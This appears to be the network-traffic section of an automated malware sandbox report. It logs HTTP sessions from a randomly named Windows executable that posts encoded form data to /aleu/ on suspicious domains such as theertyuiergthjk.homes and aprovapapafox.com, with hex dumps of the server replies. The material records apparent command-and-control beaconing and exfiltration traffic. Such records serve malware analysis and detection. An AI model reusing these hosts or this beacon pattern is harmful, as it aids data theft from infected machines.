                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          23192.168.2.749749205.234.233.38802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:43:29.591375113 CEST1813OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.theertyuiergthjk.homes
                                                                                                                                                                          Origin: http://www.theertyuiergthjk.homes
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.theertyuiergthjk.homes/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 48 49 6c 2b 35 65 6c 33 49 38 35 53 58 4d 2b 32 4d 63 46 6b 4d 69 48 36 53 70 4f 74 72 4b 2f 4e 55 2f 59 71 6f 63 78 6f 31 58 61 76 34 45 71 35 63 41 72 48 4f 54 39 47 4c 55 31 35 67 73 58 49 36 33 79 6d 71 4a 63 37 74 58 63 35 6a 66 33 36 30 37 59 76 7a 69 68 77 79 6c 49 66 61 68 72 48 52 2f 34 7a 31 71 77 34 4d 66 48 70 6d 54 66 49 35 37 4c 35 4e 58 51 79 52 35 47 6c 4f 48 4a 6d 4e 31 4f 75 42 70 57 69 34 69 59 54 71 6e 4e 75 6e 4d 6d 5a 48 42 72 6a 35 67 71 72 32 66 61 57 54 6c 31 68 59 67 70 2f 51 32 72 4b 36 2b 41 41 52 78 43 6f 7a 58 72 54 78 31 37 45 51 74 52 6a 39 76 45 41 59 69 48 37 5a 6e 79 47 49 51 33 72 71 6b 4e 36 57 53 38 6d 5a 45 79 35 68 32 4c 6b 42 64 67 6e 63 31 54 76 67 66 36 77 71 4c 47 43 39 71 64 36 6b 50 58 38 5a 6e 53 69 36 4c 59 6d 79 2b 71 74 6d 2b 6a 7a 6a 74 4e 53 46 6b 4d 35 4b 2b 67 6a 45 41 76 78 74 6e 68 72 78 76 33 4d 6b 76 73 6c 5a 76 47 66 4c 6f 65 43 41 35 66 77 2f 6e 4e 36 52 57 61 30 64 50 61 73 51 2b 4b 54 69 48 41 56 49 56 39 46 4e 6c 4a 2f 31 7a 2b 55 58 51 4a 6b 70 6c 43 30 74 4f 52 2b 32 6e 38 2f 55 30 5a 38 2b 58 74 49 50 4d 78 4e 64 6b 76 2f 6a 56 79 65 44 6a 38 66 6e 4f 64 64 35 75 69 66 32 72 49 33 34 58 4b 32 73 75 61 30 45 2f 53 72 33 59 64 4f 68 7a 4e 68 53 54 65 35 78 4d 59 61 46 34 53 5a 33 4e 67 4d 6f 52 65 76 4f 56 47 34 72 67 35 59 36 31 42 46 4e 69 6c 6c 4e 6b 63 44 38 68 66 68 46 68 74 77 5a 4f 6c 46 76 47 50 59 50 34 71 6c 57 55 74 51 4a 49 54 79 36 64 56 4f 74 58 70 44 79 70 78 4a 5a 41 37 6e 59 6e 4a 4d 4c 66 51 6b 7a 4d 36 33 64 53 79 30 59 6b 4f 49 74 53 30 58 67 30 65 32 72 6a 50 62 4c 76 43 2b 42 4d 79 31 30 34 48 31 6b 2f 51 50 54 61 4a 2b 45 2f 46 2f 47 36 4d 30 55 6a 6b 50 62 31 52 7a 71 69 69 48 34 65 55 31 54 52 56 7a 37 59 6d 49 76 4a 69 35 33 39 52 5a 4d 37 62 42 51 2f 4a 4e 72 37 4f 61 6c 5a 69 2b 78 51 69 49 32 41 56 77 35 77 38 32 67 52 70 34 42 77 42 50 51 42 6a 39 2b 73 48 70 7a 6a 2b 6b 4b 5a 66 36 68 41 52 4c 44 2f 30 42 74 41 66 32 56 54 66 41 77 36 39 5a 53 36 6e 41 33 53 32 65 55 37 71 73 5a 35 67 6f 61 33 57 76 42 55 57 41 34 4f 78 66 77 4d 62 72 78 45 6a 51 69 4a 51 4f 56 69 43 4a 54 4d 32 7a 70 4a 49 58 54 7a 6b 5a 48 6e 6d 4a 7a 71 37 4f 61 64 75 42 65 53 64 6b 6f 42 32 43 4b 30 4d 42 76 39 67 6b 6e 4f 42 44 39 31 6f 45 42 46 57 69 42 38 63 52 55 5a 39 51 37 32 57 4d 4b 65 68 43 4e 38 5a 4e 42 42 7a 64 65 51 36 32 75 46 4c 72 45 77 63 50 4a 38 69 72 72 66 71 79 37 36 6a 64 72 37 4c 4c 57 6b 68 37 71 65 4f 56 4e 70 2b 51 46 59 6f 69 61 79 54 6b 4a 31 6a 72 77 38 79 42 6f 5a 6a 32 53 35 44 52 2b 42 57 45 42 78 55 6c 5a 42 59 72 72 46 58 58 69 77 30 6a 45 51 65 74 61 46 2f 50 4b 4f 78 68 74 63 47 6b 69 65 33 4f 7a 51 65 31 66 63 66 62 6e 43 65 38 43 43 54 31 4f 7a 70 6b 2f 66 35 5a 65 6f 30 42 57 38 49 41 49 53 5a 34 5a 66 33 73 52 71 72 66 4e 47 59 62 6f 7a 4a 39 51 45 32 55 78 50 49 59 35 75 56 54 62 64 59 55 79 72 38 66 71 47 46 32 66 2f 71 4d 74 7a 33 66 47 4c 42 6d 41 43 62 45 61 65 52 37 6c 6e 37 56 36 43 36 70 68 6d 46 47 33 49 38 65 37 42 70 61 35 54 43 6d 68 49 30 72 47 75 6c 4f 6e 6e 41 71 6d 6c 2b 48 32 6f 34 2f 45 55 6f 51 49 52 72 42 72 38 37 76 46 52 4e 79 72 36 54 6c 33 6d 2b 54 44 37 41 67 47 32 43 38 6b 49 36 4c 69 41 61 36 45 41 74 67 71 4f 59 53 6c 75 6a 4b 4a 4a 5a 2f 34 4b 36 50 34 76 2b 76 32 6d 51 57 6d 56 59 6a 56 62 53 35 5a 36 64 52 33 49 43 72 6e 2f 34 2b 6b 70 51 72 44 6d 4d 70 56 66 30 34 71 6a 70 7a 58 55 37 63 6a 30 44 49 54 69 74 63 33 68 50 78 43 54 4d 30 67 44 77 71 51 41 36 49 6c 4a 61 54 4b 76 46 56 46 6c 64 42 61 39 74 4c 34 53 5a 67 46 74 2f 65 61 37 62 46 4f 6e 38 47 46 7a 6a 32 30 31 68 35 67 49 47 32 6c 6e 6c 5a 2b 51 69 6f 78 6d 39 63 52 35 68 78 49 4f 30 49 69 37 6c 6f 35 45 30 38 62 79 33 75 2f 57 36 55 67 41 4e 74 4c 58 59 75 45 56 33 61
                                                                                                                                                                          Data Ascii: MzYDklf=HIl+5el3I85SXM+2McFkMiH6SpOtrK/NU/Yqocxo1Xav4Eq5cArHOT9GLU15gsXI63ymqJc7tXc5jf3607YvzihwylIfahrHR/4z1qw4MfHpmTfI57L5NXQyR5GlOHJmN1OuBpWi4iYTqnNunMmZHBrj5gqr2faWTl1hYgp/Q2rK6+AARxCozXrTx17EQtRj9vEAYiH7ZnyGIQ3rqkN6WS8mZEy5h2LkBdgnc1Tvgf6wqLGC9qd6kPX8ZnSi6LYmy+qtm+jzjtNSFkM5K+gjEAvxtnhrxv3MkvslZvGfLoeCA5fw/nN6RWa0dPasQ+KTiHAVIV9FNlJ/1z+UXQJkplC0tOR+2n8/U0Z8+XtIPMxNdkv/jVyeDj8fnOdd5uif2rI34XK2sua0E/Sr3YdOhzNhSTe5xMYaF4SZ3NgMoRevOVG4rg5Y61BFNillNkcD8hfhFhtwZOlFvGPYP4qlWUtQJITy6dVOtXpDypxJZA7nYnJMLfQkzM63dSy0YkOItS0Xg0e2rjPbLvC+BMy104H1k/QPTaJ+E/F/G6M0UjkPb1RzqiiH4eU1TRVz7YmIvJi539RZM7bBQ/JNr7OalZi+xQiI2AVw5w82gRp4BwBPQBj9+sHpzj+kKZf6hARLD/0BtAf2VTfAw69ZS6nA3S2eU7qsZ5goa3WvBUWA4OxfwMbrxEjQiJQOViCJTM2zpJIXTzkZHnmJzq7OaduBeSdkoB2CK0MBv9gknOBD91oEBFWiB8cRUZ9Q72WMKehCN8ZNBBzdeQ62uFLrEwcPJ8irrfqy76jdr7LLWkh7qeOVNp+QFYoiayTkJ1jrw8yBoZj2S5DR+BWEBxUlZBYrrFXXiw0jEQetaF/PKOxhtcGkie3OzQe1fcfbnCe8CCT1Ozpk/f5Zeo0BW8IAISZ4Zf3sRqrfNGYbozJ9QE2UxPIY5uVTbdYUyr8fqGF2f/qMtz3fGLBmACbEaeR7ln7V6C6phmFG3I8e7Bpa5TCmhI0rGulOnnAqml+H2o4/EUoQIRrBr87vFRNyr6Tl3m+TD7AgG2C8kI6LiAa6EAtgqOYSlujKJJZ/4K6P4v+v2mQWmVYjVbS5Z6dR3ICrn/4+kpQrDmMpVf04qjpzXU7cj0DITitc3hPxCTM0gDwqQA6IlJaTKvFVFldBa9tL4SZgFt/ea7bFOn8GFzj201h5gIG2lnlZ+Qioxm9cR5hxIO0Ii7lo5E08by3u/W6UgANtLXYuEV3a
                                                                                                                                                                          Apr 26, 2024 07:43:30.138544083 CEST768INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:30 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 589
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Expires: 0
                                                                                                                                                                          Cache-control: private
                                                                                                                                                                          Data Raw: 53 6f 72 72 79 2c 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: Sorry, Page Not Found


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          24192.168.2.749750205.234.233.38802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:43:33.153696060 CEST509OUTGET /aleu/?MzYDklf=KKNe6rdgfNo6Wq6sMccsECj9DruDiqz0V/YBvfR/8knlzlDvcza3RWVYHFV7uOHMzESi0Z4HuGcox/fHqa9ciWlD8AlULX7tFKEX0vEvV/3H5nGwz5PpKkk9QKafXX45AA2PEYjdzWMv&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.theertyuiergthjk.homes
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Apr 26, 2024 07:43:33.684631109 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:33 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 2455
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Last-Modified: Thu, 21 Mar 2024 08:53:17 GMT
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          ETag: "65fbf57d-997"
                                                                                                                                                                          X-Cache: MISS
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 20 20 3c 74 69 74 6c 65 3e e5 be ae e4 bf a1 e9 98 85 e8 af bb 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 61 78 2d 61 67 65 3d 31 38 30 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 77 61 6e 6a 64 2e 63 6e 2f 6f 77 78 2f 72 65 61 64 2f 77 78 2d 72 65 61 64 2f 63 6f 73 2f 63 73 73 2f 6c 6c 63 2e 63 73 73 3f 76 65 72 3d 30 30 30 32 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 77 61 6e 6a 64 2e 63 6e 2f 6f 77 78 2f 72 65 61 64 2f 77 78 2d 72 65 61 64 2f 63 6f 73 2f 63 73 73 2f 69 6e 64 65 78 2e 63 73 73 3f 76 65 72 3d 30 30 30 39 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 77 61 6e 6a 64 2e 63 6e 2f 6f 77 78 2f 72 65 61 64 2f 77 78 2d 72 65 61 64 2f 63 6f 73 2f 63 73 73 2f 68 75 69 2f 68 75 69 2e 63 73 73 3f 76 3d 30 30 30 31 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 77 61 6e 6a 64 2e 63 6e 2f 6f 77 78 2f 72 65 61 64 2f 77 78 2d 72 65 61 64 2f 63 6f 73 2f 63 73 73 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="zh-CN"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <title></title> <meta http-equiv="Cache-Control" content="max-age=180"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-mobile-web-app-status-bar-style" content="black"> <meta name="format-detection" content="telephone=no"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0, shrink-to-fit=no, viewport-fit=cover"> <link rel="stylesheet" href="https://oss.wanjd.cn/owx/read/wx-read/cos/css/llc.css?ver=0002" /> <link rel="stylesheet" href="https://oss.wanjd.cn/owx/read/wx-read/cos/css/index.css?ver=0009" /> <link rel="stylesheet" type="text/css" href="https://oss.wanjd.cn/owx/read/wx-read/cos/css/hui/hui.css?v=0001" /> <link rel="stylesheet" href="https://oss.wanjd.cn/owx/read/wx-read/cos/css/animate.min.
                                                                                                                                                                          Apr 26, 2024 07:43:33.684664011 CEST1289INData Raw: 63 73 73 3f 76 3d 32 30 32 33 30 39 31 39 30 30 31 22 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 7e 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72
                                                                                                                                                                          Data Ascii: css?v=20230919001"> <script type="text/javascript"> ~function () { var u = navigator.userAgent.toLowerCase(); if (u.indexOf('micromessenger') == -1 || u.indexOf('android') == -1) return; var matchs = u.match(/micromesse
                                                                                                                                                                          Apr 26, 2024 07:43:33.684685946 CEST165INData Raw: 64 61 69 6c 79 2f 62 61 63 6b 31 2e 70 6e 67 22 20 2f 3e 2d 2d 3e 0a 3c 21 2d 2d 20 20 20 20 3c 73 70 61 6e 3e e8 bf 94 e5 9b 9e e4 b8 bb e9 a1 b5 3c 2f 73 70 61 6e 3e 2d 2d 3e 0a 3c 21 2d 2d 20 20 3c 2f 64 69 76 3e 2d 2d 3e 0a 3c 21 2d 2d 3c 2f
                                                                                                                                                                          Data Ascii: daily/back1.png" />-->... <span></span>-->... </div>-->...</div>--></body></html><style> #hui-dialog-msg{ color: #333333; }</style>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          25192.168.2.749751162.240.81.18802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:43:39.407094002 CEST765OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.aprovapapafox.com
                                                                                                                                                                          Origin: http://www.aprovapapafox.com
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.aprovapapafox.com/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 72 47 4a 51 32 49 2b 46 4f 4f 75 6b 7a 6e 76 4b 34 55 6f 6d 4c 2f 51 2b 52 45 32 39 36 4c 31 75 7a 62 34 4b 58 6e 6e 51 59 62 36 38 68 63 76 46 57 71 64 4e 35 67 45 46 31 37 37 38 51 6f 45 4d 6b 55 47 4e 4e 4e 56 6e 41 6a 43 5a 7a 2b 37 6c 70 6b 72 31 57 49 52 72 41 69 75 61 78 4e 39 48 69 4e 57 52 57 68 37 6d 46 59 6a 6b 46 31 74 2f 76 61 39 4e 30 49 4c 64 76 67 7a 6e 7a 67 6a 4f 2b 77 38 49 70 48 72 53 71 2f 50 4a 70 49 59 49 4e 47 41 4e 4a 51 53 66 74 53 52 44 79 2f 4e 33 4e 7a 51 79 76 41 61 78 33 6e 6e 78 36 36 2b 67 6c 45 2b 6c 6d 43 6a 77 65 4e 4c 74 54 43 4b 76 70 71 71 66 65 36 37 43 54 35 57 46 64 4c 4c 69 55 41 3d 3d
                                                                                                                                                                          Data Ascii: MzYDklf=rGJQ2I+FOOukznvK4UomL/Q+RE296L1uzb4KXnnQYb68hcvFWqdN5gEF1778QoEMkUGNNNVnAjCZz+7lpkr1WIRrAiuaxN9HiNWRWh7mFYjkF1t/va9N0ILdvgznzgjO+w8IpHrSq/PJpIYINGANJQSftSRDy/N3NzQyvAax3nnx66+glE+lmCjweNLtTCKvpqqfe67CT5WFdLLiUA==
                                                                                                                                                                          Apr 26, 2024 07:43:39.603080034 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:39 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 3650
                                                                                                                                                                          Connection: close
                                                                                                                                                                          ETag: "636d2d22-e42"
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 